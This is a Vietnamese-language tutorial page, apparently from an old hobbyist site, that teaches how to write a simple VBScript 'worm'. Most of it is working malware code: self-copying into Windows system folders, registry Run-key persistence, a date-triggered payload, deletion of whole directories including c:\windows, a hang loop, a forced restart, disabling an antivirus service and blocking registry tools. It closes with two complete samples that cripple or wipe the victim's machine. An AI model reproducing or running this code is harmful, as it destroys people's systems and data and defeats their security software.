Viết “worm” đơn giản

Copyright by Duyth

 

 

 

Phần 1:


 1) Chỉ cần dùng notepad soạn thảo và save lại với dạng file .vbs là được.
 Trong script th́
 2)nội dung sau dấu ‘ trên cùng 1 hàng th́ được coi là comment, ko có tác dụng ǵ của virus.
 Ví dụ: ‘Vbs worm created by me
 3)Test xem máy bạn có run được vbs ko = cách soạn thảo 1 file .vbs với nội dung là
 msgbox “hello my lord” nếu file này ko chạy được thỉ có thể file wscript.exe trong thư mục c:\windows\system32 của bạn bị del hay hư rùi
 4)Mở đầu code nên với :
 On Error Resume Next <- bo wa cau lenh sai
 Code:
 ‘test test test test
 msgbox “hello my lord”
 
I)Tự Copy bản thân virus tới 1 nơi trên máy tính:


 Code:
 
 On Error Resume Next '1
 Set cuong= Createobject("scripting.filesystemobject") '2
 cuong.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\cuong.vbs" '3
 
 Ḍng 2 là lệnh copy
 cuong.copyfile wscript.scriptfullname -> lấy tên file của worm
 cuong.GetSpecialFolder(1)& "\cuong.vbs -> copy vào thư mục (1) với tên file quy định là cuong.vbs. Thư mục (1) ở đây là c:\windows\system\cuong.vbs [ %SystemDir%]
 Nếu bạn thay = (0) th́ nó sẽ copy bản thân vào c:\windows\cuong.vbs [%windir%]
 Thay = (2) th́ nó sẽ copy bản thân vào thư mục temp của win [%TempDir%]
 *Ngoài 3 thư mục đó ra, muốn làm thư mục khác bạn không thể thể type thẳng vào c:\virus\cuong.vbs hay c:/virus/cuong.vbs [tui chưa nói tới v́ chưa cần thiết]


II)Ghi 1 khoá vào registry để tự execute mỗi khi khởi động máy:


 Code:
 Set cuong2= CreateObject("WScript.Shell") ‘4
 cuong2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\name","wscript.exe "&cuong.GetSpecialFolder(0)& "\cuong.vbs %" ‘5
 note: ở ḍng 5: name sau Run\ là tên của khoá trong registry, có thể thay đổi
 
III) Kỹ thuật “hẹn ngày”:


 Virus của bạn vẫn âm thầm chạy trên máy của victim nhưng chỉ tới ngày tháng bạn quy định nó mới tiến hành phá hoại. Ngày giờ được tính theo ngày giờ trên máy bị nhiễm.
 Code:
 if month(now) =12 and day(now) =25 then
 ‘your function
 msgbox "You are stupid!"
 end if
 ở đoạn code trên th́ nếu ngày 25 tháng 12 th́ nó sẽ xuất hiện thông báo you are stupid !


IV) phá hoại :


 Del file hay thư mục trên máy
 Code:
 Const vic = "c:\emiu\" ‘6
 Delvic ‘7
 Sub Delvic() ‘8
 Dim fso ‘9
 Set fso = CreateObject("Scripting.FileSystemObject") ‘10
 fso.DeleteFile vic & "*.*" , True ‘11
 fso.DeleteFolder vic & "*" , True ‘12
 End Sub
 
 Chắc các bạn đọc vào là hiểu, ḍng 6 là để khai báo đường dẫn
 Và ḍng 11 là để del file, ở đây là *.*
 Ḍng 12 là để del thư mục, ở đây là *
 Tất cả bạn đều có thể thay đổi theo mục đích. Nếu thay bằng c:\windows\ th́ 100% victim điêu đứng
 
 Làm treo máy, hay restart lại máy
 
 Code:
 ‘Run notepad một cách tự động cho tới khi treo máy, run notepad dưới chế độ ẩn chứ ko phải kiểu bomb pop-up. Cách này effect với mọi os cho nên 1 cách này là đủ rùi
 On Error Resume Next
 Set treomay= CreateObject("WScript.Shell")
 Do
 treomay.run "notepad",false
 loop
 
 Code2:
 ‘Restart
 Dim wsh
 Set wsh = createobject("wscript.shell")
 wsh.run "RUNDLL32.EXE user.exe,exitwindows"
 ‘os 95 98 9x
 
 Vô hiệu hoá anti-vizus:
 Dim wsh
 Set wsh= CreateObject( "WScript.Shell")
 s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
 Scheduler\Start"
 wsh.RegWrite s1,3, "REG_DWORD"
 Tuỳ version, bạn nên code lại để đạt hiệu quả
 
 Hiển thị message khi reboot máy
 dim wsh
 Set wsh = CreateObject( "WScript.Shell" )
 s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
 s2 = "LegalNoticeCaption"
 s3 = "LegalNoticeText"
 wsh.RegWrite s1+s2, "www.vuarong.com"
 wsh.RegWrite s1+s3, "h́nh như code này của microsoftvn"
 
 Disable Registry
 Dim objShell
 Set objShell = CreateObject( "WScript.Shell" )
 s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
 s2 = "Policies\System\DisableRegistryTools"
 objShell.RegWrite s1+s2,1, "REG_DWORD"
 ‘by microsoftvn
 
 Thêm một số command:
 lệnh execute 1 file chỉ định
 Set exe= CreateObject(“Wscipt.Shell”)
 exe.run(“c:\windows\virus.exe”)
 

Phần 2:


 2 ví dụ đơn giản
 
 1). Mỗi lần máy tính vừa mở lên th́ bị crash ngay lập tức
 ‘bigth@c
 On Error Resume Next
 Set cuong= Createobject("scripting.filesystemobject")
 cuong.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\cuong.vbs"
 Set cuong2= CreateObject("WScript.Shell")
 cuong2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cod e1","wscript.exe "&cuong.GetSpecialFolder(0)& "\cuong.vbs %"
 Set treomay= CreateObject("WScript.Shell")
 Do
 treomay.run "notepad",false
 loop
 
 2). Del c:\windows
 
 On Error Resume Next
 Set cuong= Createobject("scripting.filesystemobject")
 cuong.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\cuong.vbs"
 Set cuong2= CreateObject("WScript.Shell")
 cuong2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code2","wscript.exe "&cuong.GetSpecialFolder(0)& "\cuong.vbs %"
 Set treomay= CreateObject("WScript.Shell")
 if month(now) =7 and day(now) =1 then
 Const vic = "c:\windows\"
 Delvic
 Sub Delvic()
 Dim fso
 Set fso = CreateObject("Scripting.FileSystemObject")
 fso.DeleteFile vic & "*.*" , True
 fso.DeleteFolder vic & "*" , True
 End Sub
 end if
 
Notice: vbs có thể insert vào html được nhưng yên tâm, html này ko có đâu.

 

Quay về trang chủ
Hosted by www.Geocities.ws

1